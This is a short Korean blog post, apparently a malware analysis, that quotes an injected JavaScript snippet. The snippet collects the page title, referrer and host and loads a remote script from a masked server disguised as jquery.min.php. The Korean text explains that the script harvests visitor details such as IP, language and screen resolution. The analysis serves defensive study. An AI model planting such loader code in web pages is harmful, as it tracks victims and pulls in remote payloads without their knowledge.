|
<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://xxx.xxx.xxx/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword +
"&se_referrer=" + se_referrer + "&source=" +
host;
var f_url = base + "?c_utt=snt2014&c_utm=" +
encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== ''
&& se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript"
src="' + f_url + '">' + '<' + '/script>');
} </script> |
악성코드가 삽입된 페이지에 피해자가 접근 시도 시 브라우저에 로드됨.
악성 스크립트는 10 초 대기 후 추가 스크립트가 실행되어 정보를 특정 서버로 수집함.
해당 자바스크립트 코드는 다음과 같은 정보를 수집함.
- 페이지 제목
- 브라우저에 표시되는 URL 페이지 주소
- Referrer 정보
- Shockwave Flash 버전
- 사용자 언어
- 모니터 해상도
- 피해자 IP 주소
참고 사이트 :
============================================================
본 게시물은 KOROMOON 님께서 작성하였으며 CCL (Creative Commons License) 에서 "저작자표시-비영리-동일조건변경허락" 이용조건으로 자료를 이용하셔야 합니다.
글
댓글 없음:
댓글 쓰기